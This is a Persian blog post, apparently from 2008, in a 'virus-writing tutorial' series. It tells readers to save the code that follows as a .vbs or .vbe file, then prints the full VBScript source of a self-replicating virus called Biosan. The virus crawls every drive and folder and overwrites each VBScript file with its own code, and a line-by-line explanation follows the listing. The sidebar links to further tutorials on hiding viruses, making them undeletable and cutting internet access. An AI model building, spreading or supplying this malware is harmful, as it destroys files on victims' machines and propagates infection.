تبليغاتX
بیوگرافی ویروس ها و تجزیه و تحلیل ویروس - آموزش ویروس نویسی : ويروس Biosan
  برنامه های قابل حمل آرشیو وبلاگ

پست الکترونیک

صفحه اصلي

  
  آموزش ویروس نویسی : ويروس Biosan

اين ويروس يک نمونه از ويروس هاي vbs است که فايل هاي vbs و vbe کامپيوتر را آلوده مي کند و ساختاري بسيار ساده دارد ولي در بعضي موارد مي تواند بسيار خطرناک باشد.

ساخت ويروس:

براي ساخت ويروس کدهاي زير را در notepad ويندوز کپي کنيد.سپس از منوي فايل گزينه ي save as را انتخاب کنيد و در کادر filename نام دلخواهتان را وارد کنيد ولي بعد از نام حتما" بنويسيد:

.vbs يا .vbe


مثلا" اگر مي خواهيد نام آن را Biosan بگذاريد،در کادر بنويسيد:

Biosan.vbs يا Biosan.vbe

 


On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.is ready Then
folderlist(d.path&"\")
end if
Next
end sub
sub infectfiles(folderspec)
On Error Resume Next
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
if (ext="vbs") or (ext="vbe") then
set ap=fso.Opentextfile(f1.path,2,true)
ap.write vbscopy
ap.close
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub


توضیح ویروس

خط اول و دوم رو تو پستای قبل گفتم.در خط سوم و چهارم،ویروس خودشو به صورت یک فایل متنی باز می کند و کدهای خودش را می خواند و در حافظه نگه می دارد(این کار برای آلوده کردن فایل ها نیاز است)در خط پنج تا ده،ویروس هارد دیسک و دیگر دیسک ها را می گردد و اگر دیسکی برای آلوده کردن فایل ها آماده بود،برنامه را به خط نه تا مونده به آخر منتقل می کند.از این خط تا آخر برنامه،ویروس فولدرهای درون دیسک را می گردد و اگر فایلی را پیدا کرد که برای آلوده شدن آماده است،برنامه را به خط پانزدهم منتقل می کند.این خط تا خط نه تا مونده به آخر،فایل پیدا شده را چک می کند.اگر پسوند فایل ویژوال بیسک اسکریپت باشد،فایل را باز کرده،سپس کدهایی را که در حافظه قرار داده بود،درون آن فایل قرار می دهد و به طور کلی آن فایل را آلوده می کند.سپس همین چرخه ادامه پیدا می کند تا تمام فایل های ویژوال بیسیک اسکریپت آلوده شوند.

 نوشته شده در  سه شنبه یازدهم تیر 1387 ساعت 18:50 ارسال شده توسط :  F@rshid


ادامه مطلب



در باره وبلاگ

به علت تقاضای دوستان عــــزیزم  تصمیم گرفتم این وبلاگ را درست کنم این وبلاگ قصد دارد تمامــــی ویروس ها را به صـــــــــورت کاملاً تخصصی بررسی کند و راهـــهای پیشگیری از آن را ارائه نماید .

بهترین مطالب

قالب وبلاگ

تاریخچه ورود ویروس به دنیای کامپیوتر

استفاده از نرم‌ افزارهای ضدويروس و امنيتی و به روز نگاه داشتن آنها

از بين بردن نامه‌های الكترونيكی ناخواسته

بررسی منابع نرم‌افزاری برای جلوگیری از ورود ویروس

نگهداری نسخه‌های پشتيبان از اطلاعات

برنامه‌های مخرب دیگر

نشانه‌های وجود ویروس

انواع ویروس‌ها

عملكرد ویروس

لیست اسامی ویروس

A

B

C

D

E

F

G

H

I

J

K

L

M

N

O

P

Q

R

S

T

U

V

W

X

Y

Z

1-9

آموزش ویروس نویسی

آخرین مطالب ارسالی

کمک دوستان

نام ویروس : W32/Backdoor.ep

نام ویروس : كرم W32/Bermado

آموزش ویروس نویسی : منتشر شدن از راه فلاپی

آموزش ویروس نویسی : ويروس Biosan

آموزش ویروس نویسی : جيغ کامپيوتر را درآوريد

آموزش ویروس نویسی : قطع کردن اينترنت

آموزش ویروس نویسی : مخفی کردن و غیر قابل حذف کردن ویروس(قسمت دوم)

آموزش ویروس نویسی : مخفی کردن و غیر قابل حذف کردن ویروس(قسمت اول)

آموزش ویروس نویسی : اجرای ویروس در هر بار اجرای ویندوز



نظر سنجی

در حال آماده سازی


لیست آخرین ویروس ها

در حال آماده سازی

وبلاگ  دوستان

دانلود برنامه های پرتابل

ورزش و تندرستی

نیازمندیهای کرج

آرشیو مطالب

دی 1387

مهر 1387

تیر 1387

اردیبهشت 1387


نویسندگان

F@rshid

طراح قالب

فرشید صنعتی

وابسته به سایت اینترنتی      www.p30portable.com